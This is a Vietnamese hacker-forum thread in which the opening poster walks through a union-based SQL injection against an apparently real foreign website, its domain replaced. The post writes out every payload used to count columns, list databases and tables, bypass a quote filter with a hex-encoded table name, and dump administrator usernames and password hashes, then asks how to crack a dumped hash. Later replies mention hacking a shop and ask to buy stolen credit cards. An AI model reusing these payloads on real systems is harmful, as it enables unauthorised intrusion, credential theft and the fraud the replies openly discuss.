banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Gặp lỗi khi tấn công SQL Injection  XML
  [Question]   Gặp lỗi khi tấn công SQL Injection 28/03/2014 09:36:22 (+0700) | #1 | 280119
Nhóm Hắc Ker Tê
Member

[Minus]    0    [Plus]
Joined: 11/11/2013 03:38:33
Messages: 8
Offline
[Profile] [PM]
Chào mọi người, mình mò mãi được 1 site nước ngoài bị lỗi SQL Injection mà có thể khai thác qua phương pháp Inband, nên tập tấn công thử xem, đây là 1 phương pháp đơn giản và dể dàng nhất đối với anh em biết đến SQL Injection, nhưng còn vấp phải 1 số lỗi, cụ thể mình xin trình bày nhanh:

Trước tiên mình cũng xin gửi lời cám ơn đến 2 ad talentkong và xiuchac bên diễn đàn ceh.vn đã giúp đỡ mình trong các thao tác.

Trang mình làm dạng là:
Code:
http://www.abc.co.uk/node.php?id=1

chạy ok không lỗi
tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=1'

ok đã thấy lỗi SQL Injection
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Tiếp theo tìm số cột bằng cách chạy
Code:
http://www.abc.co.uk/node.php?id=1 order by 1--

rồi dần dần tăng lên 1 đơn vị thì thấy đến 5 là báo lỗi suy ra có 4 cột từ 1-4, ok bước này xong
Tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=nul union select 1,2,3,4--

để tìm số cột bị lỗi và ở đây nó báo là 4
Tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=null union select 1,2,3,version()--

để lấy version database thì thấy hiện Code:
5.1.73-log

Tiếp theo chay
Code:
http://www.abc.co.uk/node.php?id=5 union select 1,2,3,group_concat(schema_name) from information_schema.schemata--

để lấy tên database thì thấy báo Code:
information_schema,db312892314
ok bước này xong
Tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=5 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()--

để lấy danh sách bảng trong database thì thấy hiện 1 đống các bảng sau
Code:
administrators,album,events,gallery,links,news,p_album,p_categories,p_events,p_gallery,p_links,p_news,p_products,p_salsa,p_suscriptors,p_users,p_videos,salsa,suscriptors,users,videos

Tiếp theo chạy
Code:
http://www.abc.co.uk/node.php?id=5 uNion seleCt 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x61646d696e6973747261746f7273--

đề lấy các cột trong bảng administrators, ở đây phải thực hiện phương pháp bypass filter addslashes() chứ gõ administrator là không được.
thấy hiện lên các cột Code:
id, user_name,user_password
ok bước này xong
Tiếp theo là bước quan trọng gần xong là lấy user_name và pass trong các cột của bảng administrators
Mình chạy truy vấn sau
Code:
http://www.abc.co.uk/node.php?id=5 uNion seleCt 1,2,3,group_concat(id,0x2f,user_name,0x2f,user_password) from administrators -- -

thì đã lấy được user và pass nhưng pass dạng sau
Code:
$P$Bstga7byV42vvh7WVT/pPFPZw6j7ET.
thì dầu đoạn mã trên có ký tự $P$B thì biết đó là kiểu Decrypt MD5 $Wordpress gì đấy, vào mấy trang decrypt online mà không ăn thua, ai có cao kiến gì không ?

Xin anh em xem giúp với
NHÓM HẮC KER TÊ - LÚC THÌ ĐI HẮC LÚC THÌ ĐI HÁT ^_^
[Up] [Print Copy]
  [Question]   Gặp lỗi khi tấn công SQL Injection 29/03/2014 06:43:18 (+0700) | #2 | 280129
StarGhost
Elite Member

[Minus]    0    [Plus]
Joined: 29/03/2005 20:34:22
Messages: 662
Location: The Queen
Offline
[Profile] [PM]
Các site decrypt online thường tìm pass trong database sẵn có, nên việc không tìm thấy là chuyện thường. Mình không biết Wordpress tạo password như thế nào, nhưng nhìn dài thế kia mà nếu là MD5 thì ắt hẳn là có salt, nên việc tìm không ra password là điều hiển nhiên.
Mind your thought.
[Up] [Print Copy]
  [Question]   Gặp lỗi khi tấn công SQL Injection 05/04/2014 16:05:37 (+0700) | #3 | 280202
[Avatar]
hackeraku
Member

[Minus]    0    [Plus]
Joined: 18/07/2012 04:41:44
Messages: 4
Offline
[Profile] [PM] [Yahoo!]
chịu ròi bờ lồ bỏ thời gian đi giải mã thôi mình hack 1 shop mới có vẻ ngon hơn smilie
Tất cả là vì HVA
[Up] [Print Copy]
  [Question]   Gặp lỗi khi tấn công SQL Injection 09/04/2014 12:42:09 (+0700) | #4 | 280231
ecolitez
Member

[Minus]    0    [Plus]
Joined: 02/04/2014 00:04:07
Messages: 1
Offline
[Profile] [PM]

hackeraku wrote:
chịu ròi bờ lồ bỏ thời gian đi giải mã thôi mình hack 1 shop mới có vẻ ngon hơn smilie  


Có AE nào sell cc ko? mình đang gần mua.
[Up] [Print Copy]
  [Question]   Gặp lỗi khi tấn công SQL Injection 10/04/2014 20:17:20 (+0700) | #5 | 280280
[Avatar]
chupichu
Elite Member

[Minus]    0    [Plus]
Joined: 16/07/2004 14:17:57
Messages: 229
Location: Lầu Xanh
Offline
[Profile] [PM] [Yahoo!]
Dạo này HVA bị bỏ bê nhiều quá, không còn như xưa, đến hỏi mua cc cũng ko ai xoá bài.
P/s: Vẫn còn website dính sql à ? Hàng hiếm quá.
Where Have You Gone..
[Up] [Print Copy]
  [Question]   Gặp lỗi khi tấn công SQL Injection 27/04/2014 18:17:28 (+0700) | #6 | 280481
[Avatar]
vnsec_net
Member

[Minus]    0    [Plus]
Joined: 16/08/2012 03:10:58
Messages: 32
Location: VNSEC.NET
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
Đọc từ đầu đến cuối thì thấy chủ thread đang viết TUT hack website qua SQL Injection smilie).
--
http://www.vnsec.net - Cập nhật tự động danh sách website bị hack!
[Up] [Print Copy]
  [Question]   Gặp lỗi khi tấn công SQL Injection 13/05/2014 20:16:29 (+0700) | #7 | 280634
[Avatar]
Ezzy Auditore
Member

[Minus]    0    [Plus]
Joined: 12/05/2014 09:03:49
Messages: 3
Offline
[Profile] [PM]
:v vẫn còn web dính cá SQL Injectioni này à :v hàng này bây giờ khó kiếm smilie
[Up] [Print Copy]
  [Question]   Gặp lỗi khi tấn công SQL Injection 23/05/2014 19:08:44 (+0700) | #8 | 280702
kimsonha
Member

[Minus]    0    [Plus]
Joined: 28/05/2007 10:07:19
Messages: 46
Offline
[Profile] [PM] [Yahoo!]
SQL Injection này giờ dính đầy, chủ yếu là có vượt qua firewall được không thôi bạn.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|